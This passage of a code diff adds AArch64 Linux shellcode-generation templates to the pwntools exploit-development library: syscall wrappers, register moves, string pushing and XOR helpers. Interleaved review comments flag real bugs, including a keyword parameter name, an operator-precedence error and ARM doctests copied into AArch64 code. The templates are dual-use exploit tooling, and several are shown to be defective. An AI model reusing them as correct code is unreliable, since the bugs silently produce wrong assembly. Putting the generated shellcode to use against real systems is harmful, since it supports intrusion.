symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} 
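Review bot: `<%page args="from, to"/>` in symlink.asm uses the Python keyword `from` as a parameter name; Mako turns page args into the parameter list of the generated render function, so unless it mangles names this template fails to compile, and symlinkat in L205 (`from, tofd, to`) has the same problem. Rename it, e.g. `<%page args="from_, to"/>` with `${syscall('SYS_symlink', from_, to)}`, or fix the generator so that keyword argument names are rewritten. Less severe but in the same family: `set` (sigpending, sigprocmask, sigsuspend) and `len` (setdomainname, sethostname, splice, tee) shadow builtins inside the template namespace, which is harmless today but will bite as soon as a template body needs `len()`.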
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/symlinkat.asm b/pwnlib/shellcraft/templates/aarch64/linux/symlinkat.asm new file mode 100644 index 000000000..8feb13956 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sync.asm b/pwnlib/shellcraft/templates/aarch64/linux/sync.asm new file mode 100644 index 000000000..4374eb98a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/aarch64/linux/sync_file_range.asm new file mode 100644 index 000000000..82756c9cd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/syscall.asm b/pwnlib/shellcraft/templates/aarch64/linux/syscall.asm new file mode 100644 index 000000000..336bab058 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/syscall.asm 
@@ -0,0 +1,57 @@
+<%
+ from pwnlib.shellcraft import aarch64
+ from pwnlib.constants import eval
+ from pwnlib.abi import linux_aarch64_syscall as abi
+%>
+<%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None, arg6 = None"/>
+<%docstring>
+Args: [syscall_number, \*args]
+ Does a syscall
+
+Any of the arguments can be expressions to be evaluated by :func:`pwnlib.constants.eval`.
+
+Example:
+
+ >>> print shellcraft.aarch64.linux.syscall(11, 1, 'sp', 2, 0).rstrip()
+ /* call syscall(11, 1, 'sp', 2, 0) */
+ mov r0, #1
+ mov r1, sp
+ mov r2, #2
+ eor r3, r3 /* 0 (#0) */
+ mov r7, #0xb
+ svc 0
+ >>> print shellcraft.aarch64.linux.syscall('SYS_exit', 0).rstrip()
+ /* call exit(0) */
+ eor r0, r0 /* 0 (#0) */
+ mov r7, #(SYS_exit) /* 1 */
+ svc 0
+
+<%
+ if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'):
+ syscall_repr = syscall[4:] + "(%s)"
+ args = []
+ else:
+ syscall_repr = 'syscall(%s)'
+ if syscall == None:
+ args = ['?']
+ else:
+ args = [repr(syscall)]
+
+ for arg in [arg0, arg1, arg2, arg3, arg4, arg5]:
+ if arg == None:
+ args.append('?')
+ else:
+ args.append(repr(arg))
+ while args and args[-1] == '?':
+ args.pop()
+ syscall_repr = syscall_repr % ', '.join(args)
+
+ registers = abi.register_arguments
+ arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5]
+ regctx = dict(zip(registers, arguments))
+%>\
+ /* call ${syscall_repr} */
+%if any(arguments):
+ ${aarch64.setregs(regctx)}
+%endif
+ svc 0
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/syslog.asm b/pwnlib/shellcraft/templates/aarch64/linux/syslog.asm
new file mode 100644
index 000000000..a1fdf027c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/aarch64/linux/syslog.asm
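Review bot: `%if any(arguments):` treats a syscall number or argument of 0 as absent, so `syscall(0)` with no other arguments emits `svc 0` without ever loading the syscall-number register; the test should be `%if any(a is not None for a in arguments):`. The docstring's doctest shows ARM output (`mov r0, #1`, `mov r7, #0xb`, `eor r3, r3`) rather than the register sequence `abi.register_arguments` for `linux_aarch64_syscall` would produce, so it either fails or was never run and should be regenerated from actual output. `arg6` is accepted by the page args but dropped from `arguments`, so a seventh argument is silently ignored; either remove it from the signature or append it to the list. `syscall == None` and `arg == None` should be identity comparisons (`is None`).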
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/tee.asm b/pwnlib/shellcraft/templates/aarch64/linux/tee.asm new file mode 100644 index 000000000..2dbfbbad6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/time.asm b/pwnlib/shellcraft/templates/aarch64/linux/time.asm new file mode 100644 index 000000000..578e8ff59 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_create.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_create.asm new file mode 100644 index 000000000..8ab473e1a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_create.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_delete.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_delete.asm new file mode 100644 index 000000000..47a710750 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_getoverrun.asm new file mode 100644 index 000000000..385aa985a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_gettime.asm new file mode 100644 index 000000000..293ba99e3 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_gettime.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/timer_settime.asm b/pwnlib/shellcraft/templates/aarch64/linux/timer_settime.asm new file mode 100644 index 000000000..a48042555 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/timer_settime.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/truncate.asm b/pwnlib/shellcraft/templates/aarch64/linux/truncate.asm new file mode 100644 index 000000000..0587ef2b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/truncate64.asm b/pwnlib/shellcraft/templates/aarch64/linux/truncate64.asm new file mode 100644 index 000000000..64ef0b6d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/truncate64.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ulimit.asm b/pwnlib/shellcraft/templates/aarch64/linux/ulimit.asm new file mode 100644 index 000000000..065729880 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ulimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/umask.asm b/pwnlib/shellcraft/templates/aarch64/linux/umask.asm new file mode 100644 index 000000000..038ef2086 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/uname.asm b/pwnlib/shellcraft/templates/aarch64/linux/uname.asm new file mode 100644 index 000000000..bcff7dc9f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/unlink.asm b/pwnlib/shellcraft/templates/aarch64/linux/unlink.asm new file mode 100644 index 000000000..4f0a06ccc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/unlinkat.asm b/pwnlib/shellcraft/templates/aarch64/linux/unlinkat.asm new file mode 100644 index 000000000..f0cce2f89 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/unlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/unshare.asm b/pwnlib/shellcraft/templates/aarch64/linux/unshare.asm new file mode 100644 index 000000000..90bbd4cad --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ustat.asm b/pwnlib/shellcraft/templates/aarch64/linux/ustat.asm new file mode 100644 index 000000000..a131b5cd0 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ustat.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/utime.asm b/pwnlib/shellcraft/templates/aarch64/linux/utime.asm new file mode 100644 index 000000000..d9ff57bee --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/utimensat.asm b/pwnlib/shellcraft/templates/aarch64/linux/utimensat.asm new file mode 100644 index 000000000..97de6323a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/utimes.asm b/pwnlib/shellcraft/templates/aarch64/linux/utimes.asm new file mode 100644 index 000000000..831e694f8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/vfork.asm b/pwnlib/shellcraft/templates/aarch64/linux/vfork.asm new file mode 100644 index 000000000..dd43c49a0 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/vhangup.asm b/pwnlib/shellcraft/templates/aarch64/linux/vhangup.asm new file mode 100644 index 000000000..6ff5d6f24 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/vhangup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/vmsplice.asm b/pwnlib/shellcraft/templates/aarch64/linux/vmsplice.asm new file mode 100644 index 000000000..e6e586485 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/wait4.asm b/pwnlib/shellcraft/templates/aarch64/linux/wait4.asm new file mode 100644 index 000000000..f14bc1057 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/wait4.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/waitid.asm b/pwnlib/shellcraft/templates/aarch64/linux/waitid.asm new file mode 100644 index 000000000..2f0cb7384 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/waitid.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/waitpid.asm b/pwnlib/shellcraft/templates/aarch64/linux/waitpid.asm new file mode 100644 index 000000000..18113decb --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/write.asm b/pwnlib/shellcraft/templates/aarch64/linux/write.asm new file mode 100644 index 000000000..e23d9c696 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/write.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/writev.asm b/pwnlib/shellcraft/templates/aarch64/linux/writev.asm new file mode 100644 index 000000000..83078344f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/mov.asm b/pwnlib/shellcraft/templates/aarch64/mov.asm new file mode 100644 index 000000000..0b7fbbb1f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/mov.asm 
@@ -0,0 +1,108 @@ +<% + from pwnlib.shellcraft import common, aarch64 + from pwnlib import constants + from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.log import getLogger + from pwnlib.util.lists import group + from pwnlib.util.packing import p16, u16, pack, unpack + from pwnlib.util.fiddling import xor_pair + from pwnlib.shellcraft.registers import aarch64 as regs + log = getLogger('pwnlib.shellcraft.arm.mov') +%> +<%page args="dst, src"/> +<%docstring> +Move src into dest. + +Support for automatically avoiding newline and null bytes has to be done. + +If src is a string that is not a register, then it will locally set +`context.arch` to `'arm'` and use :func:`pwnlib.constants.eval` to evaluate the +string. Note that this means that this shellcode can change behavior depending +on the value of `context.os`. + +Examples: + + >>> print shellcraft.aarch64.mov('x0','x1').rstrip() + mov x0, x1 + >>> print shellcraft.aarch64.mov('x0','x0').rstrip() + mov x0, xzr + >>> print shellcraft.aarch64.mov('x0', 5).rstrip() + /* Set x0 = 5 = 0x5 */ + mov x0, #5 + >>> print shellcraft.aarch64.mov('x0', 0x34532).rstrip() + /* Set x0 = 214322 = 0x34532 */ + mov x0, #17714 + movk x0, #3, lsl #16 + +Args: + dest (str): The destination register. + src (str): Either the input register, or an immediate value. + +<% +if dst not in regs: + log.error('%r is not a register' % str(dst)) + +if not src in regs: + with ctx.local(arch = 'aarch64'): + src = constants.eval(src) + +mov_x0_x15 = False +xor = None + +# if isinstance(src, (int, long)): +# # Moving an immediate into x0 emits a null byte. +# # Moving a register into x0 does not. +# # Use x15 as a scratch register. +# if dst == 'x0': +# mov_x0_x15 = True +# dst = 'x15' +# +# packed = pack(src) +# words = group(2, packed) +# xor = ['\x00\x00'] * 4 +# okay = False +# +# for i, word in enumerate(list(words)): +# # If an entire word is zero, we can work around it. 
+# # However, if any of the individual bytes are '\n', or only +# # one of the bytes is a zero, we must do an XOR. +# if '\n' not in word or word == '\x00\x00' or '\x00' not in word: +# continue +# +# a, b = xor_pair(word) +# words[i] = a +# xor[i] = b +# +# src = unpack(''.join(words)) +# xor = unpack(''.join(xor)) + +%> +%if not isinstance(src, (int, long)): + mov ${dst}, ${src} +%else: + /* Set ${dst} = ${src} = 0x${'%x' % src} */ + %if src == 0: + mov ${dst}, xzr + %elif src & 0xffff == 0: + eor ${dst}, ${dst}, ${dst} + %endif + %if src & 0x000000000000ffff: + mov ${dst}, #${(src >> 0x00) & 0xffff} + %endif + %if src & 0x00000000ffff0000: + movk ${dst}, #${(src >> 0x10) & 0xffff}, lsl #16 + %endif + %if src & 0x0000ffff00000000: + movk ${dst}, #${(src >> 0x20) & 0xffff}, lsl #0x20 + %endif + %if src & 0xffff000000000000: + movk ${dst}, #${(src >> 0x30) & 0xffff}, lsl #0x30 + %endif + %if xor: + ${aarch64.mov('x14', xor)} + eor ${dst}, ${dst}, x14 + %endif + %if mov_x0_x15: + ${aarch64.mov('x0','x15')} + %endif +%endif diff --git a/pwnlib/shellcraft/templates/aarch64/pushstr.asm b/pwnlib/shellcraft/templates/aarch64/pushstr.asm new file mode 100644 index 000000000..20ed6ac0d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/pushstr.asm 
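Review bot: The `%elif src & 0xffff == 0:` branch in the immediate path can never fire, because Python binds `==` tighter than `&`, so the test reads `src & (0xffff == 0)`, i.e. `src & False`; for a value whose low halfword is zero (0x10000, say) neither `mov` nor `eor` is emitted and the following `movk` keeps whatever bits `dst` already held. Parenthesise it: `%elif (src & 0xffff) == 0:`. The logger name `'pwnlib.shellcraft.arm.mov'` and the docstring sentence about setting `context.arch` to `'arm'` look copied from the ARM template while the code sets `arch = 'aarch64'`. The `mov('x0','x0')` example expecting `mov x0, xzr` also appears inconsistent with the register branch, which as written would emit `mov x0, x0`; worth confirming against the doctest run. `mov_x0_x15` and `xor` are always False/None while the null-avoidance block stays commented out, so the two trailing `%if` blocks are dead until that code is revived.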
@@ -0,0 +1,54 @@ +<% from pwnlib.util import lists, packing, fiddling %> +<% from pwnlib.shellcraft.aarch64 import mov %> +<%page args="string, append_null = True, register='r12'"/> +<%docstring> +Pushes a string onto the stack. + +r12 is defined as the inter-procedural scratch register ($ip), +so this should not interfere with most usage. + +Args: + string (str): The string to push. + append_null (bool): Whether to append a single NULL-byte before pushing. + register (str): Temporary register to use. By default, R7 is used. + +Examples: + + >>> print shellcraft.aarch64.pushstr("Hello!").rstrip() + /* push 'Hello!\x00\x00' */ + sub sp, sp, #16 + /* Set x0 = 36762444129608 = 0x216f6c6c6548 */ + mov x0, #25928 + movk x0, #27756, lsl #16 + movk x0, #8559, lsl #0x20 + stur x0, [sp, #16 * 0] + + +<% +if append_null: + string += '\x00' + +while len(string) % 8: + string += '\x00' + +# Unpack everything into integers, and group them by twos +# so we may use STP to store multiple in a single instruction +words = packing.unpack_many(string) +pairs = lists.group(2, words) + +# The stack must be 16-byte aligned +total = len(pairs) * 16 + +offset = 0 +%>\ + /* push ${repr(string)} */ + sub sp, sp, #${total} +%for i,pair in enumerate(pairs): + ${mov('x0', pair[0])} + %if len(pair) == 1: + stur x0, [sp, #16 * ${i}] + %else: + ${mov('x1', pair[1])} + stp x0, x1, [sp, #16 * ${i}] + %endif +%endfor diff --git a/pwnlib/shellcraft/templates/aarch64/setregs.asm b/pwnlib/shellcraft/templates/aarch64/setregs.asm new file mode 100644 index 000000000..8edb912be --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/setregs.asm 
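Review bot: The `register='r12'` page argument is never read — the body hard-codes `x0` and `x1` through `mov` — and the docstring's remarks about r12/$ip and "By default, R7 is used" are ARM32 text that does not describe this AArch64 template. Either drop the parameter or honour it; in both cases the docstring should state what the template actually touches, e.g. `Clobbers x0 and x1; sp is moved down by a 16-byte-aligned amount.` The `append_null` entry should also mention that the string is padded with NUL bytes to a multiple of 8 regardless, which is what the `while len(string) % 8` loop does.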
@@ -0,0 +1,43 @@ +<% + from pwnlib.regsort import regsort + from pwnlib.constants import Constant, eval + from pwnlib.shellcraft import registers + from pwnlib.shellcraft.aarch64 import mov +%> +<%page args="reg_context, stack_allowed = True"/> +<%docstring> +Sets multiple registers, taking any register dependencies into account +(i.e., given eax=1,ebx=eax, set ebx first). + +Args: + reg_context (dict): Desired register context + stack_allowed (bool): Can the stack be used? + +Example: + + >>> print shellcraft.setregs({'x0':1, 'x2':'x3'}).rstrip() + mov x0, #1 + mov x2, x3 + >>> print shellcraft.setregs({'x0':'x1', 'x1':'x0', 'x2':'x3'}).rstrip() + mov x2, x3 + eor x0, x0, x1 /* xchg r0, r1 */ + eor x1, x0, x1 + eor x0, x0, x1 + +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} +sorted_regs = regsort(reg_context, registers.aarch64) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, dst, src in regsort(reg_context, registers.aarch64): +% if how == 'xchg': + eor ${dst}, ${dst}, ${src} /* xchg ${dst}, ${src} */ + eor ${src}, ${dst}, ${src} + eor ${dst}, ${dst}, ${src} +% else: + ${mov(dst, src)} +% endif +% endfor +% endif diff --git a/pwnlib/shellcraft/templates/aarch64/xor.asm b/pwnlib/shellcraft/templates/aarch64/xor.asm new file mode 100644 index 000000000..3fbd2dfe8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/xor.asm 
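Review bot: The loop re-runs `regsort(reg_context, registers.aarch64)` although `sorted_regs` already holds that result two lines above; use `% for how, dst, src in sorted_regs:` so the emptiness check and the iteration cannot diverge. The docstring example comment `/* xchg r0, r1 */` does not match what the template emits (`/* xchg x0, x1 */`), so that doctest looks like it would fail. `stack_allowed` and the `Constant, eval` imports are unused, and the example's `eax=1,ebx=eax` wording is leftover x86 text.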
@@ -0,0 +1,67 @@ +<% + from pwnlib.shellcraft import pretty, common, aarch64, registers + from pwnlib.shellcraft.registers import aarch64 as regs + from pwnlib.util.packing import pack, unpack + from pwnlib.context import context as ctx + from pwnlib.log import getLogger +%> +<%page args="key, address, count"/> +<%docstring> +XORs data a constant value. + +Args: + key (int,str): XOR key either as a 4-byte integer, + If a string, length must be a power of two, + and not longer than 4 bytes. + address (int): Address of the data (e.g. 0xdead0000, 'rsp') + count (int): Number of bytes to XOR. + +<% +log = getLogger('pwnlib.shellcraft.templates.aarch64.xor') + +# By default, assume the key is a register +key_size = ctx.bytes +key_pretty = key + +if not key in regs: + key_str = key + key_int = key + + if isinstance(key, int): + key_str = pack(key, bytes=4) + else: + key_int = unpack(key, 'all') + + if len(key_str) > ctx.bytes: + log.error("Key %s is too large (max %i bytes)" % (pretty(key), ctx.bytes)) + + if len(key_str) not in (1,2,4): + log.error("Key length must be a power of two (got %s)" % pretty(key)) + + key_size = len(key_str) + key_pretty = pretty(key_int) + +if count == 0 or key_size == 0: + return '/* noop xor */' + +start = common.label('start') + +## Determine the move size +word_name = {1:'BYTE', 2:'WORD', 4:'DWORD', 8:'QWORD'}[key_size] + +## Set up the register context +regctx = {'x0': count, 'x1': 